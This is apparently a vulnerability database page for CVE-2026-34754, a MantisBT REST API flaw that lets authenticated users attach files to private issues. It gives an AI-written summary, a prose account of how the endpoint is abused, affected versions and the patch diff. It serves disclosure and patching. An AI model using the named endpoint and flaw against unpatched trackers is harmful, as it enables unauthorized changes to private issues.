VYPR
← All advisories
Moderate severityGHSA Advisory· Published May 11, 2026· Updated May 11, 2026

MantisBT has an Authorization Bypass that Allows Uploading Attachments to Private Issues via REST API

CVE-2026-34754

Description

Impact

MantisBT allows an authenticated user to upload attachments to private Issues they are not authorized to access.

### Patches - b262b4d2835b81394d75356dead66e52a6275206

Workarounds

None.

Credits

Thanks to Vishal Shukla for discovering and responsibly reporting the issue.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

MantisBT allows authenticated users to upload attachments to private issues they cannot view, due to a missing issue-level authorization check in the REST API.

Vulnerability

Description

CVE-2026-34754 is an authorization bypass vulnerability in MantisBT, an open-source bug tracker. The flaw resides in the REST API endpoint POST /api/rest/issues/{id}/files, which handles file uploads to existing issues. The permission check function file_allow_bug_upload() in core/file_api.php only verifies that the user meets the project-level upload_bug_file_threshold configuration, without checking whether the user has the necessary view_bug_threshold` to access the specific issue [2]. This means an authenticated user who is allowed to upload files to a project can attach files to any issue within that project, including private or restricted issues they are not authorized to view [1][2].

Exploitation

To exploit this vulnerability, an attacker must have a valid MantisBT account with file upload privileges for a given project (i.e., their access level meets the upload_bug_file_threshold). No other special privileges are required. The attacker can then send a POST request to the REST endpoint with the ID of a private issue they should not be able to access, and the server will accept the attachment [2]. The attack is performed over the network and does not require any user interaction [3].

Impact

Successful exploitation allows an attacker to upload arbitrary files to private issues, potentially leaking sensitive information if the uploaded files are later accessible or if the act of uploading reveals the existence of the private issue. The vulnerability primarily affects data confidentiality and integrity, as the attacker can add content to issues they should not be able to modify [3].

Mitigation

The MantisBT project has released a patch in commit b262b4d2835b81394d75356dead66e52a6275206 [4]. The fix modifies the file_allow_bug_upload() function to enforce issue-level access control for existing issues: it now calls access_has_bug_level() instead of access_has_project_level() when a bug ID is provided [2][4]. Users should update to a version containing this commit. No workarounds are available [1].

References
  1. GitHub - mantisbt/mantisbt: Mantis Bug Tracker (MantisBT)
  2. 0036976: CVE-2026-34754: Authorization Bypass Allows Uploading Attachments to Private Issues via REST
  3. Authorization Bypass Allows Uploading Attachments to Private Issues via REST API
  4. Prevent unauthorized attachment upload via REST · mantisbt/mantisbt@b262b4d

AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
mantisbt/mantisbtPackagist
< 2.28.22.28.2

Affected products

2
  • Mantisbt/MantisbtGHSA2 versions
    <= 2.28.1+ 1 more
    • (no CPE)range: <= 2.28.1
    • (no CPE)

Patches

1
b262b4d2835b

Prevent unauthorized attachment upload via REST

https://github.com/mantisbt/mantisbtDamien RegadMar 30, 2026via ghsa
commit
1 file changed · +7 1
  • core/file_api.php+7 1 modified
    @@ -1178,7 +1178,13 @@ function file_allow_bug_upload( $p_bug_id = null, $p_user_id = null, $p_project_
 	}
 
 	# Check the access level against the config setting
-	return access_has_project_level( config_get( 'upload_bug_file_threshold' ), $t_project_id, $p_user_id );
+	$t_upload_bug_file_threshold = config_get( 'upload_bug_file_threshold' );
+	if( null !== $p_bug_id ) {
+		# Existing issue: if user can't view it, then they can't add attachments
+		return access_has_bug_level( $t_upload_bug_file_threshold, $p_bug_id, $p_user_id );
+	}
+	# New issue - check against project
+	return access_has_project_level( $t_upload_bug_file_threshold, $t_project_id, $p_user_id );
 }
 
 /**

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

4

News mentions

0

No linked articles in our index yet.